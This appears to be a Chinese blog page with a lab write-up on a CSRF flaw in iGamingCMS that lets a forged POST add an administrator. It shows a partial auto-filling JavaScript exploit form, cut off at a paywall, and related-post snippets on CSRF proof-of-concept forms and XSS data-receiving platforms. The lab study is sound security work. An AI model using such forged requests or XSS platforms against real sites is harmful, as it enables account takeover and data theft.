iGamingCMS CSRF漏洞伪造POST添加管理员

最新推荐文章于 2025-07-01 09:59:43 发布
原创 最新推荐文章于 2025-07-01 09:59:43 发布 · 1.4k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#CSRF

正常打开页面:http://192.168.209.137/CSRF0/admin/users.php?do=add_user
在这里插入图片描述
这个网页使用request来接受信息的,所以可以接收GET也可以接收POST,通过burp抓提交的数据包得。
在这里插入图片描述
可以看到后面有一个do参数为add_confirm和我们之前的写表单的网址http://192.168.209.137/CSRF0/admin/users.php?do=add_user有相同的参数。那么说明提交的时候是在do=add_confirm里进行的,get方式直接拼接url即可。接下来构造POST请求。

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
	<script>
	function abc(){
		var f=document.getElementById("test");
		f.getElementsByTagName("input")[0].value="user";
		f.getElementsByTagName("input")[1].value="pass";
		f.getElementsByTagName("input")[2].value="user";
		f.getElementsByTagName("input")[3].val
最低0.47元/天 解锁文章

200万优质内容无限畅学
记一次授权测试中POST型的CSRF漏洞发现
野原新之助
08-09 1296
单纯的改变Method为POST根本无法预防CSRF,因为攻击者只需要构造相应的POST表单,然后在代码中加入JS自动提交就OK了,丝毫不影响漏洞的利用。
CSRF漏洞案例---POST
Ethan024的博客
03-20 2091
CSRF漏洞案例—POST型(本文仅供技术学习与分享) 实验环境: 皮卡丘靶场—CSRFCSRF(POST) 实验步骤: 在原始的个人资料上进行修改,将性别改成Female,地址改成Beijing,邮箱改为lucy@qq.com: 查看burpsuite,发现请求通过POST方式提交,参数是通过请求体传输,因此无法通过URL伪造参数; 如图在burpsuite生成PoC 将Beijing改为ShangHai,lucy@qq.com改为jack@qq.com。再点击右下角Test
iGaming CMS-开源
05-15
iGaming CMS是专为游戏网站设计的内容管理系统。 它使用PHP和MySQL。
7.CSRF漏洞 POST请求隐藏
qq_34620296的博客
10-14 781
首先是新建一个CSRF PoC html文件 <form action="https://bug.chinacycc.com/action.php" method=POST> <input type="hidden" name="type" value="add&#95;address" /> <input type="hidden" name="info" value="111111" /> <input type="
web安全:XSS测试平台使用教程
最新发布
xiaokangss的博客
07-01 624
我接触使用过三个XSS平台 1.脚本非常丰富:[http://www.1oad.com](http://www.1oad.com/) 2.简约:[https://xsspt.com](https://xsspt.com/) 3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):[https://xsshs.cn](https://xsshs.cn/) 所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;
CSRF代码分析、漏洞讲解与post实战
永不垂头的博客
08-11 589
CSRF代码分析、漏洞讲解与post实战 一、csrf代码分析 index.php <!DOCTYPE html> <html> <head> <title>Login</title> </head> <body> <form action="" method="GET"> <p>name: <input type="text" name="name" /></
CSRF漏洞解析
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
01-07 310
文章目录一、漏洞概述1、简单概述2、场景分析3、CSRF与XSS的区别二、CSRF漏洞测试流程三、实验演示四、常见防御措施 一、漏洞概述 1、简单概述 Cross-site request forgery 简称为“CSRF”。 在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击也就完成了。所以CSRF攻击也被称为"one click"攻击。 2、场景分析 Coby,在一个购物网站上,试图修改自己的购物信息,比如收货地址。 正常情
espcms csrf漏洞 导致任意管理员添加1
08-03
由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以构造恶意的HTML页面,诱导用户点击,从而执行添加管理员的操作。 **二、漏洞成因** CSRF漏洞通常发生在Web应用中,当一个受信任的用户在未完全退出登录...
hucart-含有CSRF漏洞的源码.zip
12-31
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全问题,它允许攻击者在用户已登录的情况下,诱导用户浏览器执行非本意的操作。在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际...
PHP 代码审计之添加管理员
发哥微课堂
09-02 529
0x00:前言 cms 注册用户时,存在添加管理员漏洞,记录如下。 0x01:代码追踪 首先,前台注册普通账号时,url 地址为 / user/regin.php,打开 regin.php 发现,刚开始是接收注册数据,并进行一些校验,代码如下: if(!check::CheckUser($_POST['user_name'])) { check::AlertExit("输入的用户...
csrf实验
weixin_33708432的博客
06-22 560
CSRF攻击实验 CSRF攻击涉及用户受害者,受信任的网站和恶意网站。当受害者与受信任的站点拥有一个活跃的会话同时,如果访问恶意网站,恶意网站会注入一个HTTP请求到为受信任的站点,从而破话用户的信息。 CSRF 攻击总是涉及到三个角色:信赖的网站(Collabtive)、受害者的 session 或 cookie 以及一个恶意网站。受害...
推荐40个专业的CMS下载
weixin_33798152的博客
06-16 1731
1. Joomla CMS (Recommend) Joomla is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-us...
大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训
未来社会二十年发展的核心技术趋势由ABCD四个字母组成,分别是AI(人工智能)、BlockChain(区块链)、Cloud(云)、和Data(大数据)每一次进步都有新的认知和感触
11-25 5984
数据与网络安全作为保障大数据系统正常运行的基石,同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了,于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训,深入分析CMS系统的安全漏洞,探讨防范措施,提供实战经验和攻防能力,有助于加强大数据与网络安全意识。
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ranzi.
03-14 2359
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
手把手教你搭建XSS平台
热门推荐
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
XSS数据接收平台
2301_81475812的博客
02-16 1934
存储型则是,在将poc代码注入用户的系统中后,用户访问有存储型xss的地方,也会弹出执行的poc代码,即如下图所示;3.我的项目,点击创建,项目名称和描述随便填,之后点击下一步,选择需要的模板,这里选择“基础默认模块”就好,之后点击下一步,项目就创建成功了。4.提交后,显示安装成功,直接点击登录就跳转到,登录控制面板,输入前面的密码,即可登录到XSS接受面板。进入“我的JS”模块输入要创建的模板名,选择要用的模块,点击插入模块,之后点击新增按钮。4.将复制的payload,放到dvwa的xss模块执。
xss接收平台推荐-xss平台-xss在线平台
vetus1的博客
08-12 4659
目录二.XSS在线平台1.访问xss在线数据接收平台:2.创建xss测试项目​编辑3.查看项目对应xss测试代码4.在线功能发送即时代码5.自定义代码的利用6.伪造后台页面测试返回发送明文数据​ 7.延伸搭配自定义代码和发送js搭配模块 自动化钓鱼测试XSS平台-仅用于xss安全测试专用https://d00.cc我们可以看到 有很多返回的信息 包括页面截图 接下来我们测试一下触发效果
web靶场——xss-labs靶机平台的搭建和代码审计
weixin_51525416的博客
09-05 6427
web靶场-xss-labs靶机平台的搭建和代码审计
探索74CMS CSRF漏洞的实验性靶场实践
CSRF(Cross-Site Request Forgery),跨站请求伪造,是一种安全漏洞,它允许攻击者通过受害者的浏览器来执行非预期的命令。这种攻击能够让攻击者迫使用户执行操作,而这些操作是用户本身没有意图去执行的,如更改...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值